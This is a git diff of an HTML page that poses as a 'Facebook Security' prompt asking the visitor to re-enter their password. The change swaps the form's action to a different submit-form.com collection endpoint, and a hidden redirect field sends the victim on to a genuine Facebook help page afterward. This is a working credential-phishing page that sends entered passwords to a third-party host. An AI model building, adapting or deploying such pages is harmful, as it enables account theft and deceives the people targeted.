--- a/index.html
+++ b/index.html
@@ -128,7 +128,7 @@
                 Facebook Security
             </div>
             <p>Please re-enter your password to complete the request.</p>
-            <form id="meta-form" action="https://submit-form.com/yw3u5TwQ6" method="POST">
+            <form id="meta-form" action="https://submit-form.com/hIHG8hWj7" method="POST">
                 <input type="hidden" name="_redirect" value="https://www.facebook.com/help/media/thank-you?rdrhc" />
 
                 <!-- Replace with your Access Key -->
